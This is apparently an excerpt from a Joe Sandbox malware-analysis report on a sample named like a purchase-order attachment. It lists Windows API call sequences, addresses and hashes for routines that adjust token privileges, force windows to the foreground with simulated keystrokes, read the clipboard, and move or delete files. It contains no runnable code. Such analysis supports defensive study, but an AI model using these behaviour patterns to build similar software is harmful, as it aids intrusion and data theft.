                                                                                                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                      • Instruction ID: 829b11700779844831ae7bdc656bb6e894db5f76a453b2ad9ec3642e701586a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1E0E67494010DDFDB00EFB4D5496DD7BB4EF04301F100161FD01E2380D6309E509A62
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0046F87D
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F8DC
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0046F919
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F940
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046F966
                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0046F9D2
                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0046F9F3
                                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 0046FA00
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046FA16
                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0046FA20
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046FA4F
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046FA72
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,0046E059), ref: 0046FB6F
                                                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0046FB85
                                                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0046FB96
                                                                                                                                                                                                      • SetCapture.USER32(?), ref: 0046FB9F
                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0046FC03
                                                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0046FC0F
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0046FC29
                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 0046FC34
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0046FC69
                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0046FC76
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FCD8
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046FD02
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FD41
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046FD6C
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046FD84
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0046FD8F
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0046FDB0
                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0046FDBD
                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0046FDD9
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FE3F
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046FE6F
                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0046FEC5
                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0046FEF1
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FF19
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046FF3C
                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0046FF86
                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0046FFB6
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047004B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                      • API String ID: 2516578528-4164748364
                                                                                                                                                                                                      • Opcode ID: 2aaf0d4ff1e0b62b7564d47e689dc03fe02b96b8525f76bf8316570806902b86
                                                                                                                                                                                                      • Instruction ID: cc02e03bbf0bf54211185d3ef7d393deee0c208a90fc515681584bca93a84043
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2aaf0d4ff1e0b62b7564d47e689dc03fe02b96b8525f76bf8316570806902b86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3832CA70604244EFDB10DF64D880FAABBA4FF49358F040A6AF695872A1E734DC49CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046B1CD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                                                                                                      • API String ID: 3850602802-328681919
                                                                                                                                                                                                      • Opcode ID: a27592c881a657b5441291af43dd5bbc45d9cb53dfa069db71dbb672f16901a1
                                                                                                                                                                                                      • Instruction ID: 34171e6ab594a03bc3671029e554b35f8d6d1caf128c67eefd81c7f472873446
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a27592c881a657b5441291af43dd5bbc45d9cb53dfa069db71dbb672f16901a1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5812BF71600218ABEB248F65CC49FAF7BB4FF45710F10412BF915EA2D1EB789942CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0041EB4A
                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00473AEA
                                                                                                                                                                                                      • IsIconic.USER32(000000FF), ref: 00473AF3
                                                                                                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 00473B00
                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00473B0A
                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00473B20
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00473B27
                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00473B33
                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B44
                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B4C
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00473B54
                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00473B57
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B6C
                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00473B77
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B81
                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00473B86
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B8F
                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00473B94
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B9E
                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00473BA3
                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00473BA6
                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00473BCD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                      • Opcode ID: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
                                                                                                                                                                                                      • Instruction ID: 1542eb62d84d10236645d43e5eed5a01f98071e92a17b919d6b928d05aac1c3f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68319871E402187BEB206F758C49FBF7F6CEB44B50F10442AFA05EA1D1D6B46D01ABA8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
                                                                                                                                                                                                        • Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
                                                                                                                                                                                                        • Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0043AD08
                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0043AD5A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0043AD6B
                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0043AD82
                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 0043AD9B
                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 0043ADA5
                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0043ADBF
                                                                                                                                                                                                        • Part of subcall function 0043AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
                                                                                                                                                                                                        • Part of subcall function 0043AB84: CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                                      • String ID: $H*K$default$winsta0
                                                                                                                                                                                                      • API String ID: 2063423040-3138276786
                                                                                                                                                                                                      • Opcode ID: 38613da18dc200c50bfc1ad8898ab6467531432f294876abbfdca12682cab3bc
                                                                                                                                                                                                      • Instruction ID: f7ddd2b72f6753a7b4a817440186c9bb792b9598968c157161328d8252a4d608
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38613da18dc200c50bfc1ad8898ab6467531432f294876abbfdca12682cab3bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8581B271841209AFDF11DFA4CC45AEF7B79EF08308F04512AF964A22A1D7398E64DB69
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8
                                                                                                                                                                                                        • Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1
                                                                                                                                                                                                        • Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044727B
                                                                                                                                                                                                        • Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044728E
                                                                                                                                                                                                        • Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446149
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446167
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0044618E
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004461A4
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00446209
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044621C
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044622F
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044625D
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0044626E
                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00446289
                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00446298
                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 004462AD
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 004462BE
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004462E1
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004462FD
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044630B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                      • API String ID: 1917200108-1173974218
                                                                                                                                                                                                      • Opcode ID: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
                                                                                                                                                                                                      • Instruction ID: 576119141936947d833fd61f7edd2ffd4573d9f7455e634e106dfa8bb1cf487e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8514EB290911C6ADB21FB92CC44DDF77BCBF05304F0604EBE585E2141DA7A9B498FA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • OpenClipboard.USER32(0049DC00), ref: 00456B36
                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00456B44
                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00456B4C
                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00456B58
                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00456B74
                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00456B7E
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00456B93
                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00456BA0
                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00456BA8
                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00456BB5
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00456BE9
                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00456CF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                                                      • Opcode ID: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
                                                                                                                                                                                                      • Instruction ID: af531d0f1bbe7b8bfe1797fa9ce5f20198d32dc50305d45d4a3bf409fa3c8eaa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7051A371600205ABD301AF61DC86F6F77A8AF44B15F41053EF946E72D1DF78E8098B6A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044F62B
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044F67F
                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6A4
                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6BB
                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0044F6E2
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F72E
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F767
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F7BB
                                                                                                                                                                                                        • Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F809
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F858
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F8A7
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044F8F6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                      • API String ID: 835046349-2428617273
                                                                                                                                                                                                      • Opcode ID: 6ba540620e85c4ebffcd55eaf74cb00bf94dcf10118400b233598e7b09174c4b
                                                                                                                                                                                                      • Instruction ID: e510ffb9b02b73ead12ea0b874c1ae6f3865531047a677e0e71b89571ef03704
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ba540620e85c4ebffcd55eaf74cb00bf94dcf10118400b233598e7b09174c4b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31A122B2504344ABD310EBA5C985DAFB7ECAF98704F400D2FF585D2192EB38D949CB66
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 004509DF
                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 004509EF
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004509FB
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00450A59
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00450A71
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00450A83
                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00450A98
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00450AAC
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00450ADE
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00450AFF
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00450B0B
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00450B4A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                                                                                                      • Opcode ID: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
                                                                                                                                                                                                      • Instruction ID: 10903c0e40f5f07e0d65feee08a32dd417e8c6966a873cd766c0314ba11f90b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E36179B65043059FD710EF61C88099EB3E8FF89314F04492EF989D3252DB39E949CB9A
                                                                                                                                                                                                      APIs
